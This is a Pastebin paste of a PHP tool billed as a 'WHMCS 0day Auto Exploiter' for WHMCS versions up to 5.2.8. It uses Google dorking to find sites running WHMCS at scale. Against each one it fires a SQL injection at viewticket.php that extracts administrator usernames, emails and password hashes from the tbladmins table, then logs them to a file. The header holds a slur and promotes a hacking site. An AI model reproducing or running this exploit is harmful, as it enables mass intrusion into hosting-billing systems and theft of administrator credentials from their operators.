Advertisement
jihad-x

WHMCS 0day Auto Exploiter

Dec 26th, 2013
474
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.24 KB | None | 0 0
  1. <?php
  2. /*
  3. *****************************************************
  4. WHMCS 0day Auto Exploiter <= 5.2.8
  5. Edited Mrlele - Fuck Israhell.
  6. wwww.anonsechackers.us
  7. *****************************************************
  8. Preview:
  9. http://i.imgur.com/qB726Gm.png
  10. In action:
  11. http://i.imgur.com/oNpZAf6.png
  12. http://i.imgur.com/gFlBjtD.png
  13. *****************************************************
  14. */
  15.  
  16. set_time_limit(0);
  17. ini_set('memory_limit', '64M');
  18. header('Content-Type: text/html; charset=UTF-8');
  19. function letItBy(){ ob_flush(); flush(); }
  20. function getAlexa($url)
  21. {
  22. $xml = simplexml_load_file('http://data.alexa.com/data?cli=10&dat=snbamz&url='.$url);
  23. $rank1 = $xml->SD[1];
  24. if($rank1)
  25. $rank = $rank1->POPULARITY->attributes()->TEXT;
  26. else
  27. $rank = 0;
  28. return $rank;
  29. }
  30.  
  31. function google_that($query, $page=1)
  32. {
  33. $resultPerPage=8;
  34. $start = $page*$resultPerPage;
  35. $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
  36. $resultFromGoogle = json_decode( http_get($url, true) ,true);
  37. if(isset($resultFromGoogle['responseStatus'])) {
  38. if($resultFromGoogle['responseStatus'] != '200') return false;
  39. if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
  40. else return $resultFromGoogle['responseData']['results'];
  41. }
  42. else
  43. die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
  44. }
  45.  
  46. function http_get($url, $safemode = false){
  47. if($safemode === true) sleep(1);
  48. $im = curl_init($url);
  49. curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
  50. curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
  51. curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
  52. curl_setopt($im, CURLOPT_HEADER, 0);
  53. return curl_exec($im);
  54. curl_close();
  55. }
  56.  
  57. function check_vuln($url) {
  58. $url = dirname($url) . '/viewticket.php';
  59. $url = str_replace("/admin","",$url);
  60.  
  61. $post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,username,0x3a,email,0x3a,password,0x3a3a3a3a3a) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#";
  62. $curl_connection = curl_init($url);
  63. if($curl_connection != false) {
  64. curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
  65. curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
  66. curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
  67. curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
  68. curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
  69. curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
  70. $source = curl_exec($curl_connection);
  71. preg_match_all('/:::::(.*?):::::/s',$source,$infoz);
  72. if($infoz[0]) {
  73. return $infoz[0];
  74. }
  75. else
  76. return "Fail!";
  77. }
  78. else
  79. return "Fail!";
  80. }
  81. ?>
  82. <html>
  83. <head>
  84. <title>WHMCS Auto Xploiter - by g00n</title>
  85. </head>
  86. <body style="background-image: url('http://i.imgur.com/zHNCk2e.gif'); background-repeat: repeat; background-position: center; background-attachment: fixed;">
  87.  
  88. <STYLE>
  89. textarea{background-color:#105700;color:lime;font-weight:bold;font-size: 20px;font-family: Tahoma; border: 1px solid #000000;}
  90. input{FONT-WEIGHT:normal;background-color: #105700;font-size: 15px;font-weight:bold;color: lime; font-family: Tahoma; border: 1px solid #666666;height:20}
  91. body {
  92. font-family: Tahoma
  93. }
  94. tr {
  95. BORDER: dashed 1px #333;
  96. color: #FFF;
  97. }
  98. td {
  99. BORDER: dashed 1px #333;
  100. color: #FFF;
  101. }
  102. .table1 {
  103. BORDER: 0px Black;
  104. BACKGROUND-COLOR: Black;
  105. color: #FFF;
  106. }
  107. .td1 {
  108. BORDER: 0px;
  109. BORDER-COLOR: #333333;
  110. font: 7pt Verdana;
  111. color: Green;
  112. }
  113. .tr1 {
  114. BORDER: 0px;
  115. BORDER-COLOR: #333333;
  116. color: #FFF;
  117. }
  118. table {
  119. BORDER: dashed 1px #333;
  120. BORDER-COLOR: #333333;
  121. BACKGROUND-COLOR: Black;
  122. color: #FFF;
  123. }
  124. input {
  125. border : dashed 1px;
  126. border-color : #333;
  127. BACKGROUND-COLOR: Black;
  128. font: 8pt Verdana;
  129. color: Red;
  130. }
  131. select {
  132. BORDER-RIGHT: Black 1px solid;
  133. BORDER-TOP: #DF0000 1px solid;
  134. BORDER-LEFT: #DF0000 1px solid;
  135. BORDER-BOTTOM: Black 1px solid;
  136. BORDER-color: #FFF;
  137. BACKGROUND-COLOR: Black;
  138. font: 8pt Verdana;
  139. color: Red;
  140. }
  141. submit {
  142. BORDER: buttonhighlight 2px outset;
  143. BACKGROUND-COLOR: Black;
  144. width: 30%;
  145. color: #FFF;
  146. }
  147. textarea {
  148. border : dashed 1px #333;
  149. BACKGROUND-COLOR: Black;
  150. font: Fixedsys bold;
  151. color: #999;
  152. }
  153. BODY {
  154. SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
  155. margin: 1px;
  156. color: Red;
  157. background-color: Black;
  158. }
  159. .main {
  160. margin : -287px 0px 0px -490px;
  161. BORDER: dashed 1px #333;
  162. BORDER-COLOR: #333333;
  163. }
  164. .tt {
  165. background-color: Black;
  166. }
  167.  
  168. A:link {
  169. COLOR: White; TEXT-DECORATION: none
  170. }
  171. A:visited {
  172. COLOR: White; TEXT-DECORATION: none
  173. }
  174. A:hover {
  175. color: Red; TEXT-DECORATION: none
  176. }
  177. A:active {
  178. color: Red; TEXT-DECORATION: none
  179. }
  180.  
  181. #result{margin:10px;}
  182. #result span{display:block;}
  183. #result .Y{background-color:green;}
  184. #result .X{background-color:red;}
  185. </STYLE>
  186. <script language=\'javascript\'>
  187. function hide_div(id)
  188. {
  189. document.getElementById(id).style.display = \'none\';
  190. document.cookie=id+\'=0;\';
  191. }
  192. function show_div(id)
  193. {
  194. document.getElementById(id).style.display = \'block\';
  195. document.cookie=id+\'=1;\';
  196. }
  197. function change_divst(id)
  198. {
  199. if (document.getElementById(id).style.display == \'none\')
  200. show_div(id);
  201. else
  202. hide_div(id);
  203. }
  204. </script>
  205. </td></table></tr>
  206. <br>
  207. <br>
  208. <link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Audiowide">
  209. <style>
  210. body {
  211. font-family: 'Audiowide', serif;
  212. font-size: 30px;
  213.  
  214. }
  215. </style>
  216. </head>
  217.  
  218. <body onLoad="type_text()" ; bgColor=#000000 text=#00FFFF background="Fashion fuchsia">
  219. <center>
  220. <font face="Audiowide" color="red">WHMCS Auto Xploiter <font color="green">(0day)</font>
  221. <br>
  222. <font color="white" size="4">[For WHMCS ver. <= </font><font color="green" size="4">5.2.8</font><font color="white" size="4">]</font>
  223. </font>
  224. <br><br>
  225.  
  226. <table border=1 bordercolor=red>
  227. <tr>
  228. <td width="700">
  229. <br />
  230. <center>
  231. <form method="post">
  232. Google Dork: &nbsp;&nbsp;
  233. <input type="text" id="dork" size="30" name="dork" value="<?php echo (isset($_POST['dork']{0})) ? htmlentities($_POST['dork']) : 'inurl:submitticket.php'; ?>" />
  234. &nbsp;&nbsp;<input type="submit" value="Xploit!" id="button"/>
  235. </form>
  236. <?php
  237. if(isset($_POST['dork']{0})) {
  238. $file = fopen("WMCS-Hashes.txt","a");
  239. echo '<br /><div id="result"><b>Scanning has been started... Good luck! ;)</b><br><br>';
  240. letItBy();
  241. for($googlePage = 1; $googlePage <= 50; $googlePage++) {
  242. $googleResult = google_that($_POST['dork'], $googlePage);
  243. if(!$googleResult) {
  244. echo 'Finished scanning.';
  245. fclose($file);
  246. break;
  247. }
  248.  
  249. for($victim = 0; $victim < sizeof($googleResult); $victim++){
  250. $result = check_vuln($googleResult[$victim]['unescapedUrl']);
  251. $alexa = getAlexa($googleResult[$victim]['unescapedUrl']);
  252. if($result != "Fail!") {
  253. $hashes = "";
  254. foreach ($result as $record) {
  255. $hashes = $hashes . str_replace(':::::',',$record) . "\n";
  256. }
  257. $sep = "========================================================\n";
  258. $data = $sep . $googleResult[$victim]['unescapedUrl'] . " - Alexa: " .$alexa. "\n" . $sep . $hashes . "\n";
  259. fwrite($file,$data);
  260. echo "<br /><font color=\"green\">Successfully Xploited...</font>";
  261. echo '<span class="Y">';
  262. echo "<pre>" . $data . "</pre></span><br />";
  263.  
  264. }
  265. else {
  266. echo '<span class="X">';
  267. echo "<a href=\"{$googleResult[$victim]['unescapedUrl']}\" target='_blank'>{$googleResult[$victim]['titleNoFormatting']}</a> - <font color=\"black\">Failed!</font>";
  268. echo "</span>\n<br />";
  269. }
  270. letItBy();
  271. }
  272. }
  273. echo '</div>';
  274. }
  275. ?>
  276. </center>
  277. </td>
  278. </table>
  279. <br /><br />
  280. <font face="Audiowide" color="red" size="2">
  281. Edited by : <font color="white">Mrlele</font> <font color="white">|</font> Skype: <font color="white"><a href="Skype:lolnvmman:D">lolnvmman:D</a></font><br /><br />
  282. <br > <font color="green">For more tools/scripts/exploits/tutorials/etc.</font>
  283. <br />visit <a href="http://xploiter.net" target="_blank" style="text-decoration: none;">www.anonsechackers.us</a>
  284. </font>
  285.  
  286. </center>
  287. </body>
  288. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement